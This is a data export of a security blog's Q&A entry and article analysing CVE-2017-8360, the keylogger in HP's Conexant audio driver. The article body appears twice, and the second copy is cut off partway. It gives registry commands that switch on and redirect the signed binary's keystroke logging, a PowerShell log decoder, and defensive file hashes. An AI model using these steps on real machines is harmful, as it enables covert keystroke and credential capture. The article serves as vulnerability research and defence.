[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fWkkpgD45og5a_m0fgKAGM9sRtVLjYfZUsHD-SMHwvgY":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},263,"What is CVE-2017-8360 and why is it significant?","CVE-2017-8360 is a vulnerability in HP's Conexant audio driver that embeds a keylogger via the executables MicTray.exe (32-bit) and MicTray64.exe (64-bit). Discovered by Modzero in May 2017, it records all keystrokes by default, posing a severe privacy risk. The keylogger is particularly dangerous because it runs with a legitimate digital signature, making it hard to detect. For a full technical breakdown, see the [Analysis of CVE-2017-8360 (Keylogger in HP Audio Driver) Exploitation](\u002Fnews\u002Fanalysis-of-cve-2017-8360-keylogger-in-hp-audio-driver-exploitation).","\u003Cp>CVE-2017-8360 is a vulnerability in HP&#39;s Conexant audio driver that embeds a keylogger via the executables MicTray.exe (32-bit) and MicTray64.exe (64-bit). Discovered by Modzero in May 2017, it records all keystrokes by default, posing a severe privacy risk. The keylogger is particularly dangerous because it runs with a legitimate digital signature, making it hard to detect. For a full technical breakdown, see the [Analysis of CVE-2017-8360 (Keylogger in HP Audio Driver) Exploitation](\u002Fnews\u002Fanalysis-of-cve-2017-8360-keylogger-in-hp-audio-driver-exploitation).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fanalysis-of-cve-2017-8360-keylogger-in-hp-audio-driver-exploitation\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-cve-2017-8360-and-why-is-it-significant-1777484372753","CVE-2017-8360, HP keylogger, Conexant audio driver, MicTray.exe, digital signature",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},69,"Analysis of CVE-2017-8360 (Keylogger in HP Audio Driver) Exploitation","analysis-of-cve-2017-8360-keylogger-in-hp-audio-driver-exploitation","Technical analysis of CVE-2017-8360 HP audio driver keylogger vulnerability, including exploitation methods, reproduction steps, and defense recommendations.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In May 2017, Thorsten Schroeder, a security researcher at Swiss security firm Modzero, discovered a keylogger in HP's Conexant audio driver that illegally records user keyboard input.\u003C\u002Fp>\u003Cp>This article, solely from a technical research perspective, tests and analyzes exploitation methods, provides defense recommendations, and corrects misunderstandings found in some articles.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Brief introduction to the vulnerability\u003C\u002Fli>\u003Cli>Vulnerability reproduction\u003C\u002Fli>\u003Cli>Exploitation approach\u003C\u002Fli>\u003Cli>Defense recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Brief Introduction to the Vulnerability\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.modzero.ch\u002Fadvisories\u002FMZ-17-01-Conexant-Keylogger.txt\u003C\u002Fp>\u003Cp>After installing the HP Conexant audio driver, a scheduled task is created to execute the file MicTray.exe upon user login.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The 32-bit program is MicTray.exe, and the 64-bit program is MicTray64.exe.\u003C\u002Fp>\u003Cp>Launching MicTray.exe logs user keyboard input, saved in two ways:\u003C\u002Fp>\u003Cul>\u003Cli>Written to the file C:\\Users\\Public\\MicTray.log\u003C\u002Fli>\u003Cli>Recorded via the WinAPI OutputDebugString(), which can be read by other programs.\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x03 Vulnerability Reproduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Reference materials for vulnerability reproduction:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdiablohorn.com\u002F2017\u002F05\u002F12\u002Frepurposing-the-hp-audio-key-logger\u002F\u003C\u002Fp>\u003Cp>This section expands on the content from the reference materials, introducing methods to read the records in OutputDebugString().\u003C\u002Fp>\u003Cp>Download link for the vulnerable driver:\u003C\u002Fp>\u003Cp>ftp:\u002F\u002Fwhp-aus1.cold.extweb.hp.com\u002Fpub\u002Fsoftpaq\u002Fsp79001-79500\u002Fsp79420.html\u003C\u002Fp>\u003Cp>This link is no longer active; the download link for the individual file is:\u003C\u002Fp>\u003Cp>MicTray.exe:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.virustotal.com\u002Fnl\u002Ffile\u002Fe882149c43976dfadb2746eb2d75a73f0be5aa193623b18b50827f43cce3ed84\u002Fanalysis\u002F\u003C\u002Fp>\u003Cp>MicTray64.exe:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.virustotal.com\u002Fnl\u002Ffile\u002Fc046c7f364b42388bb392874129da555d9c688dced3ac1d6a1c6b01df29ea7a8\u002Fanalysis\u002F\u003C\u002Fp>\u003Cp>Test System: Win7 x64 (updated patches)\u003C\u002Fp>\u003Ch3>Recording Method 1: Write keyboard logging content to file C:\\Users\\Public\\MicTray.log\u003C\u002Fh3>\u003Ch4>(1) Add Registry\u003C\u002Fh4>\u003Cp>Using MicTray.exe:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hklm\\SOFTWARE\\Wow6432Node\\Conexant\\MicTray\\Hotkey \u002Fv CustomSettings \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Using MicTray64.exe:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv CustomSettings \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Choose either one\u003C\u002Fp>\u003Cp>This test selected MicTray64.exe\u003C\u002Fp>\u003Ch4>(2) Run MicTray.exe\u002FMicTray64.exe\u003C\u002Fh4>\u003Cp>Generate log file C:\\Users\\Public\\MicTray.log\u003C\u002Fp>\u003Cp>Record keyboard input content, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018753697_0_f248b57399.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Running with low privileges is sufficient; to record keyboard input in high-privilege programs, high-privilege execution is required\u003C\u002Fp>\u003Ch3>Recording method 2: Output keyboard logging content via OutputDebugString()\u003C\u002Fh3>\u003Cp>The output of WinAPI OutputDebugString() can be read via DbgView\u003C\u002Fp>\u003Cp>Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Flive.sysinternals.com\u002FDbgview.exe\u003C\u002Fp>\u003Cp>Since the installation package for the HP Conexant audio driver cannot be obtained, Procmon is used here to find the trigger method\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Dynamic debugging can also be performed to locate the function judgment conditions\u003C\u002Fp>\u003Cp>Use Procmon to monitor the registry operations of MicTray64.exe during runtime; the registry operations for recording method 1 (writing to file) are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018766214_1_144914871a.jpeg\">\u003C\u002Fp>\u003Cp>DbgView output is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018783723_2_875613cee0.jpeg\">\u003C\u002Fp>\u003Cp>Attempt to resolve the error by adding registry entries:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv HotKeyMicScancode \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv HotKeySpkScancode \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv PlaybackGPIO \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv CaptureGPIO \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>After running MicTray64.exe, configuration information is automatically added to the registry at hkcu\\SOFTWARE\\Conexant\u003C\u002Fp>\u003Cp>Testing indicates that clearing the configuration information in the registry is also necessary; otherwise, DbgView cannot capture keyboard logs\u003C\u002Fp>\u003Cp>Clear configuration information:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg delete hkcu\\SOFTWARE\\Conexant \u002Ff \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Restart MicTray64.exe to successfully obtain keyboard log messages, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018792750_3_547fdd81ed.jpeg\">\u003C\u002Fp>\u003Cp>In summary, the trigger conditions for logging method 2 (output via OutputDebugString()) are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>The registry entry hkcu\\SOFTWARE\\Conexant does not exist\u003C\u002Fli>\u003Cli>Configure the following registry entries:\u003C\u002Fli>\u003C\u002Ful>\u003Cp>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv CustomSettings \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003Cp>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv HotKeyMicScancode \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003Cp>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv HotKeySpkScancode \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003Cp>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv PlaybackGPIO \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003Cp>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv CaptureGPIO \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003Ch2>0x04 Exploitation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>From a penetration testing perspective, analyze exploitable approaches\u003C\u002Fp>\u003Cp>The save location of log files can be modified by editing the registry:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hkcu\\SOFTWARE\\Conexant\\MicTray64.exe \u002Fv LogName \u002Ft REG_SZ \u002Fd \"C:\\test\\log.txt\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>1. Keylogging for 32-bit systems\u003C\u002Fh3>\u003Cp>Configuration commands are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hkcu\\SOFTWARE\\Conexant\\MicTray.exe \u002Fv LogName \u002Ft REG_SZ \u002Fd \"C:\\test\\log.txt\"\u003Cbr>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv CustomSettings \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After executing MicTray.exe, log files are saved at C:\\test\\log.txt\u003C\u002Fp>\u003Ch3>2. Keyboard logging for 64-bit systems\u003C\u002Fh3>\u003Cp>The configuration commands for the 32-bit program (MicTray.exe) are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hkcu\\SOFTWARE\\Conexant\\MicTray.exe \u002Fv LogName \u002Ft REG_SZ \u002Fd \"C:\\test\\log.txt\"\u003Cbr>reg add hklm\\SOFTWARE\\Wow6432Node\\Conexant\\MicTray\\Hotkey \u002Fv CustomSettings \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The configuration commands for the 64-bit program (MicTray64.exe) are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hkcu\\SOFTWARE\\Conexant\\MicTray64.exe \u002Fv LogName \u002Ft REG_SZ \u002Fd \"C:\\test\\log.txt\"\u003Cbr>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv CustomSettings \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This tool implements keyboard logging by calling the WinAPI SetWindowsHookEx(). Compared to conventional keyboard logging programs, its advantage lies in containing a digital signature.\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018804052_4_23c64e9150.jpeg\">\u003C\u002Fp>\u003Ch3>3. Parsing keyboard logging content\u003C\u002Fh3>\u003Cp>The log file records the virtual key codes of the keyboard.\u003C\u002Fp>\u003Cp>A script can be used to convert virtual key codes into keyboard key names.\u003C\u002Fp>\u003Cp>Test PowerShell code from the reference link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.modzero.ch\u002Fadvisories\u002FMZ-17-01-Conexant-Keylogger.txt\u003C\u002Fp>\u003Cp>The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$filename = \"c:\\users\\public\\MicTray.log\"\u003Cbr>\u003Cbr>[System.IO.FileStream]   $fs = [System.IO.File]::Open(\u003Cbr>      $filename, \u003Cbr>      [System.IO.FileMode]::Open, \u003Cbr>      [System.IO.FileAccess]::Read, \u003Cbr>      [System.IO.FileShare]::ReadWrite)\u003Cbr>         \u003Cbr>[System.IO.StreamReader] $fr = [System.IO.StreamReader]::new(\u003Cbr>      $fs, \u003Cbr>      [Text.UTF8Encoding]::UNICODE)\u003Cbr>\u003Cbr>$el = 0\u003Cbr>\u003Cbr>while($el -lt 2) {\u003Cbr>   \u003Cbr>   $line = $fr.ReadLine()\u003Cbr>\u003Cbr>   # handle broken newlines in log...\u003Cbr>   if([string]::IsNullOrEmpty($line)) {\u003Cbr>      $el++\u003Cbr>   } else {\u003Cbr>      $el=0\u003Cbr>   }\u003Cbr>\u003Cbr>   $mc = [regex]::Match($line, \u003Cbr>         \"MicTray64.exe.*flags (0x0[A-Fa-f0-9]?).*vk (0x[A-Fa-f0-9]+)$\")\u003Cbr>   $r = $mc.Groups[2].Value\u003Cbr>\u003Cbr>   if(-Not [string]::IsNullOrEmpty($r)) {\u003Cbr>      $i = [convert]::ToInt32($r, 16)\u003Cbr>      $c = [convert]::ToChar($i)\u003Cbr>      \u003Cbr>      if($i -lt 0x20 -or $i -gt 0x7E) { $c = '.' }\u003Cbr>         \u003Cbr>      write-host -NoNewLine $(\"{0}\" -f $c)\u003Cbr>   }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>I encountered a code error during testing, as shown in the image below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018809859_5_ea78fb680b.jpeg\">\u003C\u002Fp>\u003Cp>Here is a simple solution, the code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$filename = \"c:\\users\\public\\MicTray.log\"\u003Cbr>$fr = Get-Content $filename\u003Cbr>foreach ($line in $fr)\u003Cbr>{\u003Cbr>   $mc = [regex]::Match($line, \u003Cbr>         \"MicTray64.exe.*flags (0x0[A-Fa-f0-9]?).*vk (0x[A-Fa-f0-9]+)$\")\u003Cbr>   $r = $mc.Groups[2].Value\u003Cbr>\u003Cbr>   if(-Not [string]::IsNullOrEmpty($r)) {\u003Cbr>      $i = [convert]::ToInt32($r, 16)\u003Cbr>      $c = [convert]::ToChar($i)\u003Cbr>      \u003Cbr>      if($i -lt 0x20 -or $i -gt 0x7E) { $c = '.' }\u003Cbr>         \u003Cbr>      write-host -NoNewLine $(\"{0}\" -f $c)\u003Cbr>   }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The converted output is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018815837_6_368947cf16.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Add File Blacklist\u003C\u002Fp>\u003Cp>MicTray.exe:\u003C\u002Fp>\u003Cp>SHA256:\te882149c43976dfadb2746eb2d75a73f0be5aa193623b18b50827f43cce3ed84\u003C\u002Fp>\u003Cp>MicTray64.exe:\u003C\u002Fp>\u003Cp>SHA256:\tc046c7f364b42388bb392874129da555d9c688dced3ac1d6a1c6b01df29ea7a8\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Updating Windows patches does not prevent the program from running\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article reproduces the method of CVE-2017-8360 (Keylogger in HP Audio Driver), analyzes the exploitation approach, improves the test script, and provides defense recommendations.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In May 2017, Thorsten Schroeder, a security researcher at Swiss security firm Modzero, discovered a keylogger in HP's Conexant audio driver that illegally records user keyboard input.\u003C\u002Fp>\u003Cp>This article, solely from a technical research perspective, tests and analyzes exploitation methods, provides defense recommendations, and corrects misunderstandings found in some articles.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Brief introduction to the vulnerability\u003C\u002Fli>\u003Cli>Vulnerability reproduction\u003C\u002Fli>\u003Cli>Exploitation approach\u003C\u002Fli>\u003Cli>Defense recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Brief Introduction to the Vulnerability\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.modzero.ch\u002Fadvisories\u002FMZ-17-01-Conexant-Keylogger.txt\u003C\u002Fp>\u003Cp>After installing the HP Conexant audio driver, a scheduled task is created to execute the file MicTray.exe upon user login.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The 32-bit program is MicTray.exe, and the 64-bit program is MicTray64.exe.\u003C\u002Fp>\u003Cp>Launching MicTray.exe logs user keyboard input, saved in two ways:\u003C\u002Fp>\u003Cul>\u003Cli>Written to the file C:\\Users\\Public\\MicTray.log\u003C\u002Fli>\u003Cli>Recorded via the WinAPI OutputDebugString(), which can be read by other programs.\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x03 Vulnerability Reproduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Reference materials for vulnerability reproduction:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdiablohorn.com\u002F2017\u002F05\u002F12\u002Frepurposing-the-hp-audio-key-logger\u002F\u003C\u002Fp>\u003Cp>This section expands on the content from the reference materials, introducing methods to read the records in OutputDebugString().\u003C\u002Fp>\u003Cp>Download link for the vulnerable driver:\u003C\u002Fp>\u003Cp>ftp:\u002F\u002Fwhp-aus1.cold.extweb.hp.com\u002Fpub\u002Fsoftpaq\u002Fsp79001-79500\u002Fsp79420.html\u003C\u002Fp>\u003Cp>This link is no longer active; the download link for the individual file is:\u003C\u002Fp>\u003Cp>MicTray.exe:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.virustotal.com\u002Fnl\u002Ffile\u002Fe882149c43976dfadb2746eb2d75a73f0be5aa193623b18b50827f43cce3ed84\u002Fanalysis\u002F\u003C\u002Fp>\u003Cp>MicTray64.exe:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.virustotal.com\u002Fnl\u002Ffile\u002Fc046c7f364b42388bb392874129da555d9c688dced3ac1d6a1c6b01df29ea7a8\u002Fanalysis\u002F\u003C\u002Fp>\u003Cp>Test System: Win7 x64 (updated patches)\u003C\u002Fp>\u003Ch3>Recording Method 1: Write keyboard logging content to file C:\\Users\\Public\\MicTray.log\u003C\u002Fh3>\u003Ch4>(1) Add Registry\u003C\u002Fh4>\u003Cp>Using MicTray.exe:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hklm\\SOFTWARE\\Wow6432Node\\Conexant\\MicTray\\Hotkey \u002Fv CustomSettings \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Using MicTray64.exe:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv CustomSettings \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Choose either one\u003C\u002Fp>\u003Cp>This test selected MicTray64.exe\u003C\u002Fp>\u003Ch4>(2) Run MicTray.exe\u002FMicTray64.exe\u003C\u002Fh4>\u003Cp>Generate log file C:\\Users\\Public\\MicTray.log\u003C\u002Fp>\u003Cp>Record keyboard input content, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018753697_0_f248b57399-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Running with low privileges is sufficient; to record keyboard input in high-privilege programs, high-privilege execution is required\u003C\u002Fp>\u003Ch3>Recording method 2: Output keyboard logging content via OutputDebugString()\u003C\u002Fh3>\u003Cp>The output of WinAPI OutputDebugString() can be read via DbgView\u003C\u002Fp>\u003Cp>Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Flive.sysinternals.com\u002FDbgview.exe\u003C\u002Fp>\u003Cp>Since the installation package for the HP Conexant audio driver cannot be obtained, Procmon is used here to find the trigger method\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Dynamic debugging can also be performed to locate the function judgment conditions\u003C\u002Fp>\u003Cp>Use Procmon to monitor the registry operations of MicTray64.exe during runtime; the registry operations for recording method 1 (writing to file) are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018766214_1_144914871a-1.jpeg\">\u003C\u002Fp>\u003Cp>DbgView output is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018783723_2_875613cee0-1.jpeg\">\u003C\u002Fp>\u003Cp>Attempt to resolve the error by adding registry entries:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv HotKeyMicScancode \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv HotKeySpkScancode \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv PlaybackGPIO \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv CaptureGPIO \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>After running MicTray64.exe, configuration information is automatically added to the registry at hkcu\\SOFTWARE\\Conexant\u003C\u002Fp>\u003Cp>Testing indicates that clearing the configuration information in the registry is also necessary; otherwise, DbgView cannot capture keyboard logs\u003C\u002Fp>\u003Cp>Clear configuration information:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg delete hkcu\\SOFTWARE\\Conexant \u002Ff \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Restart MicTray64.exe to successfully obtain keyboard log messages, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018792750_3_547fdd81ed-1.jpeg\">\u003C\u002Fp>\u003Cp>In summary, the trigger conditions for logging method 2 (output via OutputDebugString()) are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>The registry entry hkcu\\SOFTWARE\\Conexant does not exist\u003C\u002Fli>\u003Cli>Configure the following registry entries:\u003C\u002Fli>\u003C\u002Ful>\u003Cp>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv CustomSettings \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003Cp>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv HotKeyMicScancode \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003Cp>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv HotKeySpkScancode \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003Cp>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv PlaybackGPIO \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003Cp>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv CaptureGPIO \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003Ch2>0x04 Exploitation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>From a penetration testing perspective, analyze exploitable approaches\u003C\u002Fp>\u003Cp>The save location of log files can be modified by editing the registry:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hkcu\\SOFTWARE\\Conexant\\MicTray64.exe \u002Fv LogName \u002Ft REG_SZ \u002Fd \"C:\\test\\log.txt\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>1. Keylogging for 32-bit systems\u003C\u002Fh3>\u003Cp>Configuration commands are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hkcu\\SOFTWARE\\Conexant\\MicTray.exe \u002Fv LogName \u002Ft REG_SZ \u002Fd \"C:\\test\\log.txt\"\u003Cbr>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv CustomSettings \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After executing MicTray.exe, log files are saved at C:\\test\\log.txt\u003C\u002Fp>\u003Ch3>2. Keyboard logging for 64-bit systems\u003C\u002Fh3>\u003Cp>The configuration commands for the 32-bit program (MicTray.exe) are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hkcu\\SOFTWARE\\Conexant\\MicTray.exe \u002Fv LogName \u002Ft REG_SZ \u002Fd \"C:\\test\\log.txt\"\u003Cbr>reg add hklm\\SOFTWARE\\Wow6432Node\\Conexant\\MicTray\\Hotkey \u002Fv CustomSettings \u002Ft REG_DWORD \u002Fd 